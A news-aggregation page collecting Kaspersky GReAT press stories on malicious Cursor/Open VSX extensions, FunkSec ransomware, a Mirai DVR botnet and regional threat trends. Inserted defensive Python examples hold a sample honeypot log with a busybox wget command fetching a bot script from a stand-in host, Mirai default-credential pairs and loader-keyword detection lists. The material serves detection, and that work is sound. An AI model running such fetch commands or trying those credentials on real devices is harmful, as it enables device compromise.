Latest news with #GReAT


Zawya
2 days ago
- Zawya
Kaspersky uncovers $500K crypto heist through malicious packages
Kaspersky GReAT (Global Research and Analysis Team) experts have discovered open-source packages that download the Quasar backdoor and a stealer designed to exfiltrate cryptocurrency. The malicious packages target the Cursor AI development environment, an AI-assisted coding tool based on Visual Studio Code. They are extensions hosted in the Open VSX repository that claim to provide support for the Solidity programming language; in practice, they download and execute malicious code on users' devices.

During an incident response engagement, a blockchain developer from Russia reached out to Kaspersky after installing one of these fake extensions on his computer, which allowed attackers to steal approximately $500,000 worth of crypto assets. The threat actor deceived the developer by making the malicious package rank higher than the legitimate one in search results, which the attacker achieved by artificially inflating the malicious package's download count to 54,000.

Figure: search results for the query 'solidity', with the malicious extension highlighted in red and the legitimate one highlighted in green.

After installation, the victim gained no actual functionality from the extension. Instead, the ScreenConnect remote-access software was installed on the computer, granting the threat actors remote access to the infected device. Using this access, they deployed the open-source Quasar backdoor along with a stealer that collects data from browsers, email clients, and crypto wallets. With these tools, the threat actors obtained the developer's wallet seed phrases and subsequently stole cryptocurrency from the accounts. After the extension the developer had installed was discovered and removed from the repository, the threat actor republished it and inflated its installation count further, to 2 million, compared to 61,000 for the legitimate package.
The extension was removed from the platform following a request from Kaspersky. 'Spotting compromised open-source packages with the naked eye is becoming increasingly difficult. Threat actors are using increasingly creative tactics to deceive potential victims, even developers who have a strong understanding of cybersecurity risks — particularly those working in the blockchain development field. As we expect adversaries to continue targeting developers, it is recommended that even experienced IT professionals deploy dedicated security solutions to safeguard sensitive data and prevent financial losses,' commented Georgy Kucherin, Security Researcher with Kaspersky's Global Research and Analysis Team.

The threat actor behind the attack published not only malicious Solidity extensions but also an NPM package, solsafe, which likewise downloads ScreenConnect. A few months earlier, three additional malicious Visual Studio Code extensions were released (solaibot, among-eth, and blankebesxstnion); all of them have already been removed from the repository.

To stay safe, Kaspersky recommends:
• Use a solution for monitoring the open-source components in use, in order to detect threats that might be hidden inside them.
• If you suspect that a threat actor may have gained access to your company's infrastructure, use the Kaspersky Compromise Assessment service to uncover any past or ongoing attacks.
• Verify package maintainers: check the credibility of the maintainer or organization behind the package. Look for a consistent version history, documentation, and an active issue tracker.
• Stay informed on emerging threats: subscribe to security bulletins and advisories related to the open-source ecosystem. The earlier you know about a threat, the faster you can respond.

More information is available in a report on

About Kaspersky
Kaspersky is a global cybersecurity and digital privacy company founded in 1997.
With over a billion devices protected to date from emerging cyberthreats and targeted attacks, Kaspersky's deep threat intelligence and security expertise is constantly transforming into innovative solutions and services to protect individuals, businesses, critical infrastructure, and governments around the globe. The company's comprehensive security portfolio includes leading digital life protection for personal devices, specialized security products and services for companies, as well as Cyber Immune solutions to fight sophisticated and evolving digital threats. We help millions of individuals and over 200,000 corporate clients protect what matters most to them. Learn more at
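The 'verify package maintainers' advice above can be partly automated. The block below is an added example, not code from the original article or from Kaspersky: it scores registry metadata for the signals the text names (a download count out of proportion to the extension's age and version history, no source repository, no issue tracker) and shows how an install script can pin the expected publisher instead of taking whatever ranks first. The two records are constructed, the field names are assumed to resemble what a registry such as Open VSX exposes, the publisher namespaces are hypothetical, and the thresholds are illustrative; the script runs offline on the embedded records.

```python
"""Heuristic trust audit for extension-registry metadata (added example).

The records below are constructed and the field names are assumptions
modelled on what a registry such as Open VSX exposes; adapt the loader to
the real API response before running this on live data.
"""
from datetime import datetime, timezone

# Constructed records (not real registry data). Two extensions share the
# name "solidity"; only the publisher namespace tells them apart.
SAMPLE_EXTENSIONS = [
    {
        "namespace": "legit-publisher",          # hypothetical publisher
        "name": "solidity",
        "downloadCount": 61_000,
        "versions": ["0.0.1", "0.0.2", "0.0.3", "0.0.4", "0.0.5"],
        "firstPublished": "2023-01-10T00:00:00Z",
        "repository": "https://example.invalid/legit-publisher/solidity",
        "bugs": "https://example.invalid/legit-publisher/solidity/issues",
    },
    {
        "namespace": "newcomer-42",              # hypothetical publisher
        "name": "solidity",
        "downloadCount": 2_000_000,
        "versions": ["1.0.0"],
        "firstPublished": "2025-06-20T00:00:00Z",
        "repository": None,
        "bugs": None,
    },
]

# Fixed reference clock so the audit is repeatable; use
# datetime.now(timezone.utc) against a live registry.
NOW = datetime(2025, 7, 1, tzinfo=timezone.utc)

# Illustrative thresholds, not calibrated values.
MAX_PLAUSIBLE_DOWNLOADS_PER_DAY = 10_000
LARGE_DOWNLOAD_COUNT = 100_000


def _parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def audit_extension(ext: dict, now: datetime = NOW) -> list:
    """Return the list of warnings for one record (empty means nothing odd)."""
    warnings = []
    age_days = max((now - _parse_ts(ext["firstPublished"])).days, 1)
    per_day = ext["downloadCount"] / age_days
    if per_day > MAX_PLAUSIBLE_DOWNLOADS_PER_DAY:
        warnings.append(f"download velocity {per_day:,.0f}/day over {age_days} days")
    if len(ext["versions"]) <= 1 and ext["downloadCount"] > LARGE_DOWNLOAD_COUNT:
        warnings.append("single release but a large download count")
    if not ext.get("repository"):
        warnings.append("no source repository declared")
    if not ext.get("bugs"):
        warnings.append("no issue tracker declared")
    return warnings


def rank_by_trust(exts: list) -> list:
    """Order same-name candidates: fewest warnings first, longer history breaks ties."""
    return sorted(exts, key=lambda e: (len(audit_extension(e)), -len(e["versions"])))


def pick_expected(exts: list, name: str, expected_namespace: str) -> dict:
    """Pin the publisher: return the record for `name` from the expected namespace.

    Raises LookupError when the pinned publisher is absent, so an install
    script fails closed instead of taking whatever ranks first.
    """
    for ext in exts:
        if ext["name"] == name and ext["namespace"] == expected_namespace:
            return ext
    raise LookupError(f"{expected_namespace}/{name} not found in registry results")


if __name__ == "__main__":
    for ext in rank_by_trust(SAMPLE_EXTENSIONS):
        flags = audit_extension(ext) or ["no warnings"]
        print(f"{ext['namespace']}/{ext['name']}: " + "; ".join(flags))
```

The point of ranking by warning count rather than by download count is exactly the trick described in the article: a download counter is attacker-controlled, while a multi-year version history and a linked issue tracker are much harder to fake overnight. A real deployment would fetch the records from the registry API and keep the expected namespace in a lock file checked into the project.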


Biz Bahrain
07-07-2025
- Business
- Biz Bahrain
Inside FunkSec: Kaspersky explores the evolution of AI-powered ransomware with password-gated capabilities
Kaspersky experts revealed the inner workings of FunkSec, a ransomware group that illustrates the future of mass cybercrime: AI-powered, multifunctional, highly adaptive and operating on volume, with ransoms as low as $10,000 to maximize profits.

Kaspersky's Global Research and Analysis Team (GReAT) constantly monitors the ransomware threat landscape, where attacks continue to rise. According to the company's latest State of Ransomware report, the share of users affected by ransomware attacks worldwide increased by 0.02 percentage points to 0.44% from 2023 to 2024. While this percentage may appear modest compared to other cyberthreats, it reflects the fact that attackers typically prioritize high-value targets rather than mass distribution, making each incident potentially devastating.

Within this evolving landscape, FunkSec has emerged as a particularly concerning threat. Active for less than a year since its emergence in late 2024, FunkSec has quickly surpassed many established actors by targeting the government, technology, finance and education sectors. What sets FunkSec apart is its sophisticated technical architecture and AI-assisted development. The group packages full-scale encryption and aggressive data exfiltration into a single Rust-based executable, capable of disabling over 50 processes on victim machines and equipped with self-cleanup features to evade defenses. Beyond its core ransomware functionality, FunkSec has expanded its toolkit to include a password generator and a basic DDoS tool, both showing clear signs of code synthesis using large language models (LLMs).

FunkSec's approach reflects the evolving landscape of mass cybercrime, combining advanced tools and tactics. Kaspersky's GReAT experts highlight the key features that define its operations:

Password-controlled functionality
GReAT experts discovered that the FunkSec ransomware features a unique password-based mechanism that controls its operation modes. Without a password, the malware performs basic file encryption; providing a password activates a more aggressive data exfiltration process in addition to encryption, in order to steal sensitive data. FunkSec packs full-scale encryption, local exfiltration and self-cleanup into a single Rust binary, without a side-loader or a companion script. That level of consolidation is uncommon and gives affiliates a plug-and-play tool they can deploy almost anywhere.

Use of AI in development
Code analysis shows that FunkSec is actively using generative artificial intelligence to create its tools. Many parts of the code appear to be automatically generated rather than manually written. Signs of this include generic placeholder comments (such as 'placeholder for actual check') and technical inconsistencies, like commands for different operating systems that don't align properly. Additionally, the presence of declared but unused functions, such as modules included upfront but never utilized, reflects how large language models combine multiple code snippets without pruning redundant elements. 'More and more, we see cybercriminals leveraging AI to develop malicious tools. Generative AI lowers barriers and accelerates malware creation, enabling cybercriminals to adapt their tactics faster. By reducing the entry threshold, AI allows even less experienced attackers to quickly develop sophisticated malware at scale,' comments Marc Rivero, Lead Security Researcher at Kaspersky's GReAT.

High-volume, low-ransom strategy
FunkSec demands unusually low ransom payments, sometimes as little as $10,000, and pairs this with the sale of stolen data at discounted prices to third parties. This strategy appears designed to enable a high volume of attacks, helping the group quickly establish its reputation within the cybercriminal underground. Unlike traditional ransomware groups that seek million-dollar ransoms, FunkSec employs a high-frequency, low-cost model, further underscoring its use of AI to streamline and scale operations.

Expansion beyond ransomware
FunkSec has expanded its capabilities beyond the ransomware binary. Its dark leak site (DLS) hosts additional tools, including a Python-based password generator designed to support brute-force and password-spraying attacks, as well as a basic DDoS tool.

Advanced evasion
FunkSec employs advanced evasion techniques to avoid detection and complicate forensic analysis. The ransomware is capable of stopping over 50 processes and services to ensure thorough encryption of targeted files. Additionally, it includes a fallback mechanism to execute certain commands even if the user launching FunkSec lacks sufficient privileges.

Kaspersky's products detect this threat as HEUR:

To stay protected from ransomware attacks, Kaspersky experts recommend that organizations follow these best practices:
• Enable ransomware protection for all endpoints. There is a free Kaspersky Anti-Ransomware Tool for Business that shields computers and servers from ransomware and other types of malware, prevents exploits and is compatible with already installed security solutions.
• Always keep software updated on all the devices you use to prevent attackers from exploiting vulnerabilities and infiltrating your network.
• Focus your defense strategy on detecting lateral movement and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminals' connections to your network.
• Set up offline backups that intruders cannot tamper with. Make sure you can access them quickly when needed or in an emergency.
• Install anti-APT and EDR solutions, enabling capabilities for advanced threat discovery and detection, investigation and timely remediation of incidents.
• Provide your SOC team with access to the latest threat intelligence and regularly upskill them with professional training. All of the above is available within the Kaspersky Expert Security framework.
• Use the latest Threat Intelligence information to stay aware of the actual Tactics, Techniques, and Procedures (TTPs) used by threat actors.
• To protect the company against a wide range of threats, use solutions from the Kaspersky Next product line, which provide real-time protection, threat visibility, and the investigation and response capabilities of EDR and XDR for organizations of any size and industry. Depending on your current needs and available resources, you can choose the most relevant product tier and easily migrate to another one if your cybersecurity requirements change.
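The code-level indicators listed under 'Use of AI in development' (placeholder comments, commands for mismatched operating systems, and functions or modules declared but never used) can be turned into a quick triage pass over a recovered script. The block below is an added example and is neither Kaspersky's analysis tooling nor FunkSec code: it runs those checks over a constructed Python snippet using the standard library's ast module. The command-name lists and the comment pattern are assumptions chosen for illustration, and the snippet is invented so that every check fires.

```python
"""Triage heuristics for signs of machine-generated code (added example).

Constructed sample and illustrative word lists; none of this is FunkSec
code or Kaspersky tooling. These are weak signals: plenty of hand-written
scripts carry TODOs and dead helpers, so treat hits as corroboration for
an analyst, not as attribution.
"""
import ast
import re

# Constructed sample exhibiting the indicators the article lists:
# a placeholder comment, a Windows and a Unix process-kill command with no
# platform check, an unused import, and a function nobody calls.
SAMPLE_SOURCE = '''
import os
import subprocess

def stop_services():
    # Placeholder for actual check
    subprocess.run(["taskkill", "/F", "/IM", "backup.exe"])
    subprocess.run(["pkill", "-9", "backup"])

def cleanup():
    # TODO: implement self-cleanup
    pass

def unused_helper(x):
    return x * 2

if __name__ == "__main__":
    stop_services()
    cleanup()
'''

# Assumed indicator lists; extend for the tooling you actually see.
PLACEHOLDER_RE = re.compile(r"#\s*(placeholder|todo|implement)", re.IGNORECASE)
WINDOWS_CMDS = {"taskkill", "vssadmin", "wmic", "sc"}
UNIX_CMDS = {"pkill", "killall", "rm", "shred"}


def placeholder_comments(source: str) -> list:
    """1-based line numbers of comments that read like unfilled placeholders."""
    return [i for i, line in enumerate(source.splitlines(), 1)
            if PLACEHOLDER_RE.search(line)]


def _referenced_names(tree: ast.AST) -> set:
    return {n.id for n in ast.walk(tree) if isinstance(n, ast.Name)}


def unused_functions(source: str) -> list:
    """Functions defined at any level but never referenced anywhere."""
    tree = ast.parse(source)
    defined = {n.name for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)}
    return sorted(defined - _referenced_names(tree))


def unused_imports(source: str) -> list:
    """Imported modules that the code never touches (the 'included upfront' tell)."""
    tree = ast.parse(source)
    imported = set()
    for n in ast.walk(tree):
        if isinstance(n, (ast.Import, ast.ImportFrom)):
            for alias in n.names:
                imported.add((alias.asname or alias.name).split(".")[0])
    return sorted(imported - _referenced_names(tree))


def mixed_os_commands(source: str) -> list:
    """Windows- and Unix-only commands in one file with no visible platform check."""
    tree = ast.parse(source)
    literals = {n.value for n in ast.walk(tree)
                if isinstance(n, ast.Constant) and isinstance(n.value, str)}
    win = sorted(literals & WINDOWS_CMDS)
    nix = sorted(literals & UNIX_CMDS)
    platform_guard = "platform" in source or "os.name" in source
    return win + nix if (win and nix and not platform_guard) else []


def triage(source: str) -> dict:
    """Run every check and return the findings in one dictionary."""
    return {
        "placeholder_comment_lines": placeholder_comments(source),
        "unused_functions": unused_functions(source),
        "unused_imports": unused_imports(source),
        "mixed_os_commands": mixed_os_commands(source),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_SOURCE).items():
        print(f"{key}: {value}")
```

For a compiled Rust binary such as the one described, the same idea applies to recovered strings rather than source: placeholder text and command names for both platforms surviving into the binary are the equivalent signals, though dead-function detection then needs the disassembler's call graph rather than ast.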


Biz Bahrain
11-06-2025
- Biz Bahrain
Kaspersky discovers multiple IoT devices targeted with a new Mirai botnet version
Kaspersky Global Research & Analysis Team (GReAT) researchers have found multiple IoT devices targeted with a new version of the Mirai botnet. The majority of attacked devices were located in China, Egypt, India, Brazil, Türkiye and Russia. Mirai remains one of the top threats to IoT in 2025 due to widespread exploitation of weak login credentials and unpatched vulnerabilities, enabling large-scale botnets for DDoS attacks, data theft and other malicious activities. According to Kaspersky research, there were 1.7 billion attacks on IoT devices (including those carried out with Mirai) coming from 858,520 devices globally in 2024; 45,708 attacks on IoT devices (including those carried out with Mirai) were launched from the UAE in 2024, 54% more than in 2023.

To explore IoT attacks, how they are carried out and how to prevent them, Kaspersky set up so-called honeypots: decoy devices used to attract the attention of attackers and analyze their activities. In the honeypots Kaspersky detected exploitation of the CVE-2024-3721 vulnerability to deploy a bot, which turned out to be a Mirai botnet modification. A botnet is a network of compromised devices infected by malware to perform coordinated malicious activities under the control of an attacker. This time, the focus of the attacks was digital video recorders (DVRs). These devices are integral to security and surveillance across multiple sectors: they record footage from cameras to monitor homes, retail stores, offices and warehouses, as well as factories, airports, train stations and educational institutions, to enhance public safety and secure critical infrastructure. Attacks on DVR devices can compromise privacy, but beyond that, they can serve as entry points for attackers to infiltrate broader networks, spreading malware and creating botnets to launch DDoS attacks, as seen with Mirai.

The discovered DVR bot includes mechanisms to detect and evade virtual machine (VM) environments or emulators commonly used by security researchers to analyze malware. These techniques help the bot avoid detection and analysis, allowing it to operate more stealthily and remain active on infected devices.

'The source code of the Mirai botnet was shared on the internet nearly a decade ago, and since then, it has been adapted and modified by various cybercriminal groups to create large-scale botnets mostly focused on DDoS and resource hijacking. Exploiting known security flaws in IoT devices and servers that haven't been patched, along with the widespread use of malware targeting Linux-based systems, leads to a significant number of bots constantly searching the internet for devices to infect. By analyzing public sources we identified over 50,000 exposed DVR devices online, indicating that attackers have numerous opportunities to target unpatched, vulnerable devices,' comments Anderson Leite, Security Researcher with Kaspersky's GReAT.

To reduce the risk of IoT device infection, users should:
• Change default credentials and use strong, unique passwords.
• Regularly update DVR firmware to patch known vulnerabilities.
• Disable remote access if unnecessary, or use secure VPNs for management.
• Segment DVRs on isolated networks.
• Monitor for unusual network traffic to detect potential compromises.

Read more about the latest Mirai wave at
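The article names the two things a honeypot shows most clearly during a Mirai wave: login attempts with factory-default credentials and, after a successful login, a command that fetches the bot. The block below is an added example, not Kaspersky's honeypot code and not tied to CVE-2024-3721 (which the page does not detail): it parses a constructed telnet-honeypot log in a hypothetical key=value layout, counts default-credential attempts per source address, and flags any source that either cycles through known default pairs or runs a download command. The credential list is a small illustrative subset of the kind of pairs Mirai-family bots try, and the IP addresses are documentation ranges.

```python
"""Mirai-style credential-stuffing and loader detection over a honeypot
log (added example). Log lines, log format and IPs are constructed."""
import re
from collections import defaultdict

# Constructed honeypot output in a hypothetical key=value layout (not real
# telemetry); adapt LINE_RE to whatever your honeypot actually emits.
SAMPLE_LOG = """\
2025-06-01T10:00:01Z src=203.0.113.7 event=login user=root pass=xc3511 result=fail
2025-06-01T10:00:02Z src=203.0.113.7 event=login user=root pass=vizxv result=fail
2025-06-01T10:00:03Z src=203.0.113.7 event=login user=admin pass=admin result=fail
2025-06-01T10:00:04Z src=203.0.113.7 event=login user=root pass=888888 result=success
2025-06-01T10:00:05Z src=203.0.113.7 event=cmd data="/bin/busybox wget http://198.51.100.9/dvr.sh -O /tmp/.x"
2025-06-01T10:05:00Z src=198.51.100.23 event=login user=operator pass=Xk9!vq2L result=fail
2025-06-01T10:07:30Z src=198.51.100.23 event=login user=operator pass=Xk9!vq2M result=success
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) event=(?P<event>\w+) (?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Small illustrative subset of vendor defaults of the kind Mirai-family
# bots cycle through; replace with the factory credentials of the devices
# you actually operate.
DEFAULT_CREDS = {("root", "xc3511"), ("root", "vizxv"), ("admin", "admin"),
                 ("root", "888888"), ("root", "admin"), ("admin", "1234")}
# Substrings that mark a post-login fetch of a second stage.
LOADER_MARKERS = ("busybox", "wget", "tftp", "curl")


def parse_log(text: str) -> list:
    """Turn each log line into a dict; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in KV_RE.findall(m.group("rest"))}
        events.append({"ts": m.group("ts"), "src": m.group("src"),
                       "event": m.group("event"), **fields})
    return events


def triage_sources(events: list) -> dict:
    """Per-source counters: attempts, default-credential attempts, success, loader commands."""
    stats = defaultdict(lambda: {"attempts": 0, "default_cred_attempts": 0,
                                 "login_success": False, "loader_commands": []})
    for ev in events:
        s = stats[ev["src"]]
        if ev["event"] == "login":
            s["attempts"] += 1
            if (ev.get("user"), ev.get("pass")) in DEFAULT_CREDS:
                s["default_cred_attempts"] += 1
            if ev.get("result") == "success":
                s["login_success"] = True
        elif ev["event"] == "cmd":
            data = ev.get("data", "")
            if any(marker in data for marker in LOADER_MARKERS):
                s["loader_commands"].append(data)
    return dict(stats)


def flagged_sources(events: list, min_default_attempts: int = 3) -> list:
    """Sources that cycle default pairs or drop a loader; threshold is illustrative."""
    return [src for src, s in triage_sources(events).items()
            if s["default_cred_attempts"] >= min_default_attempts or s["loader_commands"]]


if __name__ == "__main__":
    parsed = parse_log(SAMPLE_LOG)
    for src, s in triage_sources(parsed).items():
        print(src, s)
    print("flagged:", flagged_sources(parsed))
```

The same two counters are worth running against a real DVR's own authentication log, not just a honeypot: a burst of factory-default pairs from one address is a scan, and a factory-default pair that succeeds after a firmware update was supposed to rotate it is an alert on its own.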


Tahawul Tech
27-05-2025
- Business
- Tahawul Tech
Kaspersky shares cybersecurity trends for the META region
Kaspersky's Global Research & Analysis Team shared insights on the cyberthreat landscape in the Middle East, Türkiye, and Africa (META) region for the first quarter of 2025. The data revealed that Türkiye and Kenya recorded the highest share of users impacted by web-based threats (26.1% and 20.1% respectively), followed by Qatar at 17.8%. Meanwhile, Jordan, Egypt, the UAE and Saudi Arabia reported the lowest share of users targeted by web-borne attacks across the META region.

Ransomware remains one of the most destructive cyberthreats this year. According to Kaspersky data, the share of users affected by ransomware attacks increased globally by 0.02 p.p. to 0.44% from 2023 to 2024. In the Middle East the growth was 0.07 p.p. to 0.72%; in Africa, 0.01 p.p. to 0.41%; in Türkiye, 0.06 p.p. to 0.46%. Attackers often don't distribute this type of malware on a mass scale but prioritize high-value targets, which reduces the overall number of incidents. That ransomware prevalence is not growing sharply does not mean it is becoming less dangerous. In the Middle East ransomware affected a higher share of users due to rapid digital transformation, expanding attack surfaces and varying levels of cybersecurity maturity. Ransomware is less prevalent in Africa due to lower levels of digitisation and economic constraints, which reduce the number of high-value targets. However, as countries like South Africa and Nigeria expand their digital economies, ransomware attacks are on the rise, particularly in the manufacturing, financial and government sectors. Limited cybersecurity awareness and resources leave many organisations vulnerable, though the smaller attack surface means the region remains behind global hotspots.
Ransomware trends
AI tools are increasingly being used in ransomware development, as demonstrated by FunkSec, a ransomware group that emerged in late 2024 and quickly gained notoriety by surpassing established groups like Cl0p and RansomHub with multiple victims claimed in December alone. Operating under a Ransomware-as-a-Service (RaaS) model, FunkSec employs double extortion tactics — combining data encryption with exfiltration — targeting sectors such as government, technology, finance, and education in Europe and Asia. The group's heavy reliance on AI-assisted tools sets it apart, with its ransomware featuring AI-generated code, complete with flawless comments, likely produced by Large Language Models (LLMs) to enhance development and evade detection. Unlike typical ransomware groups demanding millions, FunkSec adopts a high-volume, low-cost approach with unusually low ransom demands, further highlighting its innovative use of AI to streamline operations.
In 2025, ransomware is expected to evolve by exploiting unconventional vulnerabilities, as demonstrated by the Akira gang's use of a webcam to bypass endpoint detection and response systems and infiltrate internal networks. Attackers are likely to increasingly target overlooked entry points like IoT devices, smart appliances or misconfigured hardware in the workplace, capitalising on the expanding attack surface created by interconnected systems. As organisations strengthen traditional defences, cybercriminals will refine their tactics, focusing on stealthy reconnaissance and lateral movement within networks to deploy ransomware with greater precision, making it harder for defenders to detect and respond in time.

The proliferation of LLMs tailored for cybercrime will further amplify ransomware's reach and impact. LLMs marketed on the dark web lower the technical barrier to creating malicious code, phishing campaigns and social engineering attacks, allowing even less skilled actors to craft highly convincing lures or automate ransomware deployment.
As more innovative concepts such as RPA (Robotic Process Automation) and low-code, which provide an intuitive, visual, AI-assisted drag-and-drop interface for rapid software development, are quickly adopted by software developers, we can expect ransomware developers to use these tools to automate their attacks as well as new code development, making the threat of ransomware even more prevalent.

'Ransomware is one of the most pressing cybersecurity threats facing organisations today, with attackers targeting businesses of all sizes and across every region, including META. Ransomware groups continue to evolve by adopting techniques, such as developing cross-platform ransomware, embedding self-propagation capabilities and even using zero-day vulnerabilities that were previously affordable only for APT actors. There is also a shift toward exploiting overlooked entry points — including IoT devices, smart appliances, and misconfigured or outdated workplace hardware. These weak spots often go unmonitored, making them prime targets for cybercriminals', said Sergey Lozhkin, Head of META and APAC regions in the Global Research and Analysis Team at Kaspersky. 'To stay secure, organisations need a layered defence: up-to-date systems, network segmentation, real-time monitoring, robust backups, and continuous user education'.

Kaspersky experts continuously monitor highly sophisticated cyberattacks, including the activity of 25 advanced persistent threat (APT) groups currently operating in the META region. Among these are well-known actors such as SideWinder, Origami Elephant, and MuddyWater. Kaspersky has observed a growing use of creative exploits targeting mobile devices, along with ongoing advancements in techniques designed to evade detection, key trends shaping today's targeted attack landscape.
Kaspersky encourages organisations to follow these best practices to safeguard their digital assets:
• Always keep software updated on all the devices you use to prevent attackers from exploiting vulnerabilities and infiltrating your network.
• Focus your defence strategy on detecting lateral movement and data exfiltration to the Internet. Pay special attention to outgoing traffic to detect cybercriminals' connections to your network.
• Set up offline backups that intruders cannot tamper with. Make sure you can access them quickly when needed or in an emergency.
• Provide your SOC team with access to the latest threat intelligence and regularly upskill them with professional training.
• Use the latest Threat Intelligence information to stay aware of the actual Tactics, Techniques, and Procedures (TTPs) used by threat actors.
• To protect the company against a wide range of threats, use solutions from the Kaspersky Next product line, which provide real-time protection, threat visibility, and the investigation and response capabilities of EDR and XDR for organisations of any size and industry. Depending on your current needs and available resources, you can choose the most relevant product tier and easily migrate to another one if your cybersecurity requirements change.
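Both recommendation lists on this page (the one in the FunkSec item and the one above) tell defenders to focus on data exfiltration and 'pay special attention to outgoing traffic' without saying what to compute. The block below is an added example and is not Kaspersky product logic: it compares a baseline day of flow records against the current day, per internal host, and raises a finding when a host sends a large volume to an external destination it has never contacted before, or when its total external upload jumps well above its own baseline. The flow records are constructed (documentation IP ranges, hypothetical workstation names, hypothetical field names) and the thresholds are illustrative; one block serves both passages.

```python
"""Baseline-versus-today outbound traffic check (added example).

Flow records, host names and thresholds are constructed for illustration;
this is not a Kaspersky detection and the export layout is hypothetical.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# RFC 1918 ranges; add your own public prefixes if your hosts use them.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"),
                 ip_network("192.168.0.0/16")]

# Constructed flow records. 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges standing in for external services; 10.0.0.5 is an
# invented internal file server that must not count as exfiltration.
BASELINE_FLOWS = [
    {"host": "ws-01", "dst": "203.0.113.10", "port": 443, "out": 2_000_000, "in": 40_000_000},
    {"host": "ws-01", "dst": "203.0.113.10", "port": 443, "out": 1_500_000, "in": 30_000_000},
    {"host": "ws-02", "dst": "203.0.113.10", "port": 443, "out": 1_000_000, "in": 25_000_000},
    {"host": "ws-02", "dst": "10.0.0.5", "port": 445, "out": 200_000_000, "in": 1_000_000},
]
TODAY_FLOWS = [
    {"host": "ws-01", "dst": "203.0.113.10", "port": 443, "out": 2_200_000, "in": 38_000_000},
    {"host": "ws-01", "dst": "198.51.100.77", "port": 443, "out": 800_000_000, "in": 50_000},
    {"host": "ws-02", "dst": "203.0.113.10", "port": 443, "out": 900_000, "in": 20_000_000},
    {"host": "ws-02", "dst": "10.0.0.5", "port": 445, "out": 300_000_000, "in": 1_000_000},
]

# Illustrative thresholds, to be tuned per environment.
MIN_NEW_DST_BYTES = 50_000_000   # upload to a destination absent from the baseline
VOLUME_RATIO = 3.0               # today's external upload versus the host's baseline


def is_external(ip: str) -> bool:
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def outbound_profile(flows: list) -> dict:
    """host -> {external destination -> bytes sent}; internal-only flows are dropped."""
    profile = defaultdict(lambda: defaultdict(int))
    for f in flows:
        if is_external(f["dst"]):
            profile[f["host"]][f["dst"]] += f["out"]
    return {host: dict(dsts) for host, dsts in profile.items()}


def detect_exfil(baseline: list, today: list,
                 min_new_dst_bytes: int = MIN_NEW_DST_BYTES,
                 volume_ratio: float = VOLUME_RATIO) -> list:
    """Findings for hosts whose outbound behaviour departs from their own baseline."""
    base = outbound_profile(baseline)
    cur = outbound_profile(today)
    findings = []
    for host, dsts in cur.items():
        known = set(base.get(host, {}))
        for dst, sent in dsts.items():
            if dst not in known and sent >= min_new_dst_bytes:
                findings.append({"host": host, "dst": dst, "bytes_out": sent,
                                 "reason": "large upload to a destination absent from baseline"})
        base_total = sum(base.get(host, {}).values())
        cur_total = sum(dsts.values())
        if base_total and cur_total > volume_ratio * base_total:
            findings.append({"host": host, "dst": None, "bytes_out": cur_total,
                             "reason": f"external upload {cur_total / base_total:.0f}x the baseline"})
    return findings


if __name__ == "__main__":
    for f in detect_exfil(BASELINE_FLOWS, TODAY_FLOWS):
        target = f["dst"] or "all external destinations"
        print(f"{f['host']}: {f['reason']} ({f['bytes_out']:,} bytes to {target})")
```

Internal-to-internal flows are excluded so that a nightly copy to a file server does not look like exfiltration. In production the baseline would come from a week or more of flow exports rather than a single day, and the new-destination rule needs an allowlist for CDNs and update services or it will fire on every patch cycle; the per-host ratio rule is the one that survives that noise, because it compares a machine only with itself.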


Time of India
27-04-2025
- Business
- Time of India
Cybersecurity firm Kaspersky bets big on India as key growth market
Cybersecurity firm Kaspersky is betting on India as a strategic growth market, recognising the country's rapid digitalisation and increasing cybersecurity needs, and aims to expand local teams and strengthen collaborations across various sectors. General Manager for India region at Kaspersky Jaydeep Singh shared that the company has tripled its workforce in the country in the past two years, with new hires in sales, pre-sales, and support roles. He also highlighted the presence of global research teams based in India that monitor more than 900 advanced persistent threat (APT) groups daily. "In the last two years, we have tripled our employee base in have part of the global research teams based out of India who do the threat hunting," Singh told PTI on the sidelines of GITEX Asia 2025. GReAT (Kaspersky Global Research and Analysis Team) plays a crucial role in Kaspersky's global threat intelligence operations. Kaspersky is investing in digital footprint intelligence (DFI) analysts to bolster services, including brand monitoring and takedown operations. Kaspersky views India as a key innovation hub and plans to continue expanding its resources and research capabilities within the country. "We are expanding quite a bit both in respect to our key resources, and researchers in the Indian geography," Singh noted. The company emphasises its commitment to building local talent and is actively collaborating with government agencies and private sector entities to enhance cybersecurity awareness and infrastructure. Kaspersky is engaging with state governments and nodal agencies like CERT-In to develop cyber defence programmes and training initiatives. Singh also praised the Indian regulatory environment, highlighting the pragmatic nature of acts like the Digital Personal Data Protection Act (DPDP) and robust guidelines from agencies such as the RBI and SEBI. 
He anticipates further developments in AI regulation and expressed Kaspersky's willingness to collaborate and provide input to policymakers. With a growing base of internet users, the need for robust cyber technologies is rapidly increasing, especially to protect internet-facing assets, mobile handsets, and operational technology (OT) systems. Kaspersky detects over 450,000 unique malware samples daily, leveraging AI and machine learning in its research and mitigation strategies. Singh emphasised the need to create a "cyber immune world" where systems are highly resistant to breaches, particularly in both IT and OT environments. "What we are seeing in the last decade or so is that the intensity of attacks on the IT systems and the OT systems has increased tremendously. So, we expect that cyber immunity as a concept will become stronger and will become more relevant over the next decade's time also. "So, Kaspersky is investing big time in India, in the last 2 years we have increased our commitment nearly three times. What we are looking at is India to be an innovation hub for us. A hub for a lot of collaboration with agencies, and we see great potential over the next decades' time to be part of India's growth story and a part of this cyber resilience story for the Indian market," Singh said. The Russian firm recorded double-digit growth in India in 2024.